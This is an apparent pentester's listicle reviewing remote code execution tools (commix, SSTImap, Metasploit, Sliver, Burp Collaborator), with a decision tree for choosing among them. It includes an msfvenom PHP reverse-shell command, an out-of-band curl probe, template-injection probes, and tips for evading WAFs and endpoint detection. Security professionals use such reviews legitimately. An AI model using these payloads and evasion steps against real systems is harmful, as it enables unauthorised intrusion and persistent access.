The Best RCE Tools in 2026

A tools listicle is only useful if the author actually uses the tools. This is the short list of remote code execution tools I have spent real engagement hours with in 2026, across the broad RCE family: OS command injection, server side template injection, eval injection, and the post-exploit layer that comes after a working primitive.

If you want the underlying mechanics first, the RCE deep dive covers the variants and the web application security vulnerabilities taxonomy covers where RCE sits in the broader map. This article is for the choice of which tool to run once you have a candidate sink.

The decision matrix

A quick read of the table: commix is the default for shell-out injection. SSTImap is the default for template injection. Metasploit and Sliver handle the post-primitive stage. Burp Collaborator is how you confirm the blind cases. PayloadsAllTheThings is the reference everyone keeps open in a second tab.

1. commix

Repo: github.com/commixproject/commix

The default for OS command injection. The sqlmap-equivalent for shell-out sinks.

commix (Command Injection Exploiter) automates detection and exploitation of OS command injection the way sqlmap automates SQLi. It covers results-based injection, blind time-based injection, file-based out-of-band detection, and ships with a working pseudo-shell once the injection lands. It speaks every injection vector that matters: GET/POST parameters, cookies, HTTP headers (including User-Agent and Referer), JSON bodies, and multipart forms.

What I like:

• The -r request.txt flow with Burp is identical to sqlmap. Capture, save, point commix at the file. Muscle memory transfers.
• Pseudo-shell mode (--os-shell) gives you an interactive prompt over the injection without writing your own loop. Works on Linux and Windows targets.
• Tamper scripts cover the common evasions (space-to-IFS, comment-injection, base64-encoded payloads). Writing your own is a short Python file.
• Honest about blind vs results-based. The output tells you which technique landed, not just "vulnerable".

What I do not like:

• Default User-Agent is commix/x.y.z. Like sqlmap, every WAF has this signatured. --random-agent first, always.
• Detection is noisy by default. On a real target with monitoring you want --technique=T (time-based only) plus --delay to slow the probe rate.
• Output is verbose. -v 1 is usable, -v 3 is debugging.
• Coverage of argument injection (a close cousin) is thin. For argument injection you are usually crafting by hand.

When to use it. Any time a parameter looks like it ends up in system(), exec(), popen(), subprocess.Popen(shell=True), or a backtick. Start with commix. If it finds nothing in a reasonable scan and you still suspect injection, move to manual Burp Repeater with the PayloadsAllTheThings command-injection list.

2. SSTImap

Repo: github.com/vladko312/SSTImap

The default for server side template injection in 2026.

SSTImap is the actively maintained fork of tplmap, picked up by vladko312 after epinna's original went dormant. It automates detection and exploitation across the template engines that show up in real applications: Jinja2 (Python/Flask), Mako, Tornado, Twig (PHP), Smarty, Freemarker (Java), Velocity, ERB (Ruby), Pug, and a handful of others. For each engine it tries the engine-specific escape sequences, confirms the sink, then offers code-execution and file-read primitives where the engine permits.

What I like:

• Engine coverage is the broadest of any maintained SSTI tool. The detection ladder tries each engine's canonical probe ({{7*7}} for Jinja-family, ${7*7} for Freemarker/Velocity, <%= 7*7 %> for ERB) and moves on cleanly.
• Once an engine is confirmed, the exploitation path knows which sandbox-escape primitives apply. For Jinja2 it walks the __class__.__mro__ chain; for Twig it reaches for _self.env.registerUndefinedFilterCallback; for Freemarker it tries the freemarker.template.utility.Execute import.
• -r request.txt workflow with Burp, same as sqlmap and commix.
• The fork has had meaningful releases through 2025 and 2026. Issues get triaged.

What I do not like:

• Smaller community than commix or sqlmap. Fewer eyes on weird engines.
• Some of the engine probes are still pattern-matched against response text; a target that renders 49 for any reason produces a false positive. Verify by changing the multiplication.
• The line between SSTI and eval injection blurs once you reach for the engine's "execute arbitrary code" feature. Read what the tool is actually doing before you run it against production.

When to use it. Any parameter that ends up rendered through a template engine. Forms that echo back your input, error pages that interpolate query parameters, email-template previews, server-rendered admin dashboards. Start with the {{7*7}} / ${7*7} probe in Burp Repeater; if you get 49, point SSTImap at the request.

3. tplmap (the predecessor)

Repo: github.com/epinna/tplmap

The original SSTI automation tool. Use SSTImap instead in 2026.

tplmap is epinna's original SSTI tool, the inspiration for SSTImap. It still works for the engines it shipped with, but maintenance has been light for years. The Python 2/3 transition left rough edges, and several engine probes are now stale against current versions of Jinja2 and Twig that have tightened their sandboxes.

I include it here because the name still comes up in older write-ups and engagement reports, and because the SSTImap fork ports cleanly from any tplmap muscle memory. If you have an existing tplmap workflow, switch to SSTImap; the flags are nearly identical and the fork actively gets new engines.

When to use it. Only if you are reproducing a finding from an older report against an engine SSTImap has dropped. Otherwise default to SSTImap.

4. msfvenom + Metasploit Framework

Docs: docs.metasploit.com

The payload-generation and post-exploitation backbone. Still essential in 2026.

msfvenom generates payloads in every flavour an engagement asks for: staged and stageless reverse shells, bind shells, executable formats (PE, ELF, Mach-O), web shells (PHP, JSP, ASP, ASPX), shellcode for raw use, and DLL/SO sideload payloads. The wider Metasploit Framework wraps these with a listener (exploit/multi/handler), post-modules for credential dumping and lateral movement, and a working session manager (Meterpreter for the rich case, plain reverse shells for the minimal case).

What I like:

• msfvenom alone is worth installing the framework for. Generating a working PHP reverse shell, a Windows reverse-TCP exe, or a Linux ELF stager is a single command each.
• Encoders and bad-character handling (-b "\x00\x0a") save real time when the injection sink mangles certain bytes.
• The post-exploitation module library is enormous and well-tested. Privilege escalation enumeration, hashdump, kerberos extraction, persistence; all there.
• Free, open source, BSD-licensed. No procurement conversation.

What I do not like:

• Default payloads are heavily signatured by every endpoint product. Defender, CrowdStrike, SentinelOne all flag stock msfvenom shellcode on sight. You will need to encode, encrypt, or replace the loader for anything serious.
• Meterpreter is loud on the network. Modern EDR sees the staging traffic instantly. For real engagements, use it for the initial foothold and then switch to a quieter C2.
• The framework install footprint is large. On a minimal attacker VM, msfvenom alone (via the standalone install) is often enough.

When to use it. Generating payloads for any RCE primitive: msfvenom -p php/reverse_php LHOST=... LPORT=... -f raw produces a one-liner you drop into the commix --os-shell prompt. The full framework when you need the post-exploitation library or quick listener setup. For sustained access on a real engagement, hand off to Sliver.

5. Sliver

Repo: github.com/BishopFox/sliver

The open-source Cobalt Strike replacement. The C2 framework I reach for in 2026.

Sliver is Bishop Fox's open-source command-and-control framework. Written in Go, cross-compiled to Windows, Linux, and macOS implants, with mTLS, WireGuard, HTTP(S), and DNS transport options out of the box. The server runs on a Linux box you control, operators connect over a TLS client, and implants beacon back over whichever transport you configured at generation time.

What I like:

• Compiles unique implants per operation. Static signatures from one engagement do not carry to the next.
• WireGuard transport is excellent for stealth; the traffic looks like generic UDP and there is no TLS handshake to fingerprint.
• Multi-operator support out of the box. Two operators can drive the same server, see each other's sessions, hand off implants.
• Active development, healthy issue tracker, real maintainership at Bishop Fox.
• Free. No per-seat commercial licence to expense (Cobalt Strike's pricing is only published behind a Fortra quote, but it is a real procurement line item; Sliver is not).

What I do not like:

• Smaller post-exploitation library than Cobalt Strike's BOFs ecosystem. You will be writing some primitives yourself.
• Documentation has caught up but still trails Metasploit's. Reading the source is occasionally faster than reading the docs.
• The DNS transport is functional but noisy on volume-based detection. Use it for the canary, not for bulk data movement.

When to use it. Any engagement past the initial foothold where you need durable C2. The msfvenom payload gets you onto the host; the Sliver implant keeps you there. For everything Cobalt Strike used to do in 2018-2022, Sliver is the answer now.

6. Burp Suite + Collaborator

Site: portswigger.net/burp

Not an RCE tool; the platform every web RCE workflow runs on. Collaborator is how you find blind RCE.

Burp's role in RCE work is the same as in SQLi work: intercepting proxy, request manipulator, manual workflow. The Collaborator addition is the critical piece for RCE specifically. Blind RCE (no command output, no error, just a sink that runs your input) is invisible without an out-of-band channel. Collaborator gives you a unique subdomain you can curl, nslookup, or wget from the target; any hit back to that subdomain is proof the injection executed.

What I like:

• Repeater for hand-crafted payload tweaking. When commix or SSTImap is wrong and the manual approach is right, you live here.
• Collaborator is the only reliable OOB listener for most engagements. The free interactsh works for many cases but Collaborator is more robust against DNS-filtering targets.
• Intruder (Pro) for fuzzing parameters with the PayloadsAllTheThings command-injection list.

What I do not like:

• Pro licence is around 500 USD per user per year. Worth it; the Collaborator alone justifies it for any serious web work.
• Community edition's Repeater is sufficient but the rate-limited Intruder is not usable for real fuzzing.
• The CLI exists but is awkward. For scripted RCE confirmation, interactsh plus a curl loop is often faster.

When to use it. Always running in the background. Capture requests there, export to commix or SSTImap. Use Collaborator to confirm blind RCE before claiming a finding.

7. PayloadsAllTheThings

Site: swisskyrepo.github.io/PayloadsAllTheThings

Not a tool; the reference. The second tab every operator has open during a web engagement.

swisskyrepo's PayloadsAllTheThings is a curated, MIT-licensed repository of attack payloads, bypasses, and reference notes for every web injection family. The Command Injection and Server Side Template Injection sections are the canonical lookups when commix or SSTImap is silent and you need to hand-craft. The repo is updated regularly, accepts community contributions, and is structured per-vulnerability so cross-reference is fast.

What I like:

• One canonical source. No more grepping through five blog posts for the right Jinja2 sandbox escape.
• Engine-specific SSTI sections cover sandbox escapes that SSTImap may not try by default.
• Command injection section covers the unusual cases: Windows cmd.exe quoting, restricted shells, ${IFS} workarounds.

What I do not like:

• It is a reference, not a tool. You still need to deliver the payloads through Burp or curl.
• Quality varies between sections; the heavily-trafficked ones (SQLi, XSS, SSTI, Command Injection) are excellent, the long-tail ones are uneven.

When to use it. Keep it open during every engagement. When commix or SSTImap stops finding things, the right next payload is almost always already in there.

What I do not recommend

Cobalt Strike (in 2026)

I have used Cobalt Strike on real engagements and it remains technically excellent. The reasons to drop it in 2026 are practical, not technical: Fortra's licensing is a real procurement line item (pricing is quote-only and gated behind a vetting process), the open-source alternatives have closed most of the capability gap, and the leaked-binary situation has poisoned the well for any organisation that does not want CS traffic patterns on their network. Sliver gives me 90% of what I used Cobalt Strike for, with no procurement conversation and unique-per-engagement implants. If you are starting an engagement in 2026 and not already paying for Cobalt Strike, start with Sliver.

"RCE scanner" wrappers

Several commercial scanners advertise "RCE detection" as a feature. In practice they wrap a payload list against a parameter sweeper and report anything that looks like it executed. The false-positive rate is high, the false-negative rate on anything blind or template-based is higher, and you cannot tune the underlying detection. If you want commix, run commix; if you want SSTImap, run SSTImap; the wrapper is dead weight in between.

pentestmonkey reverse-shell cheat sheet as a standalone tool

The cheat sheet is fine and I still link to it occasionally, but PayloadsAllTheThings has absorbed its content with better maintenance. Use PayloadsAllTheThings; the pentestmonkey page is essentially frozen.

Tools I dropped from this year's list

• Empire (PowerShell Empire). The 2.x maintenance ended; BC-Security's 5.x fork is alive but the Windows-only PowerShell focus is too narrow for cross-platform engagements. Sliver covers the same ground with broader transport options.
• Pupy. Cross-platform Python C2 framework, conceptually similar to Sliver. Maintenance has been light, the Python footprint on target hosts is loud, and the project has not kept pace.
• Veil-Evasion. Payload obfuscation framework. Effectively unmaintained; msfvenom plus a modern loader does the same job with less ceremony.
• Cobalt Strike (see above). Still on shelves at organisations that already paid, but not what I recommend for new engagements.

Which tool should I use? (Decision tree)

A short flow for the common cases:

• Is the sink a system() / exec() / shell-out call with user-controlled input?
  • Yes. commix first. If it finds nothing in a reasonable scan and you still suspect injection, manual Burp Repeater with PayloadsAllTheThings.
• Does the parameter end up rendered through a template engine (Jinja2, Twig, Freemarker, ERB, Smarty, etc.)?
  • Yes. Test with {{7*7}} / ${7*7} / <%= 7*7 %> in Burp Repeater. If you get 49, point SSTImap at the request.
• Is the sink an eval() / Function() / exec() call against a server-side language string?
  • Yes. This is eval injection, not OS command or template injection. No good automation tool covers this well; craft by hand from PayloadsAllTheThings, confirm via Collaborator.
• No visible response and you suspect blind RCE?
  • Yes. Burp Collaborator (or interactsh). Inject a DNS-resolving primitive (curl http://uniqueid.collaborator.net) and wait for the hit.
• You have a working primitive and need a payload?
  • msfvenom for the payload, exploit/multi/handler for a one-off listener, Sliver for sustained C2.
• You need durable, multi-host C2 across a network?
  • Sliver. Generate unique implants per host, use WireGuard transport, drop the msfvenom stager once the implant lands.

A note on the year stamp

I will refresh this list every twelve months. The slug stays stable (best-rce-tools-2026 is a redirect target you can rely on; future years update the H1 and title). Tools added, dropped, and re-ranked here will appear in the next refresh with a short changelog at the top.

Where to go next

• Remote code execution: variants, exploitation, and defence for the underlying mechanics
• OS command injection for the shell-out family
• Argument injection for the close cousin commix does not cover well
• Server side template injection for the template-engine family
• Eval injection for the language-eval family
• Web application security vulnerabilities taxonomy for the broader map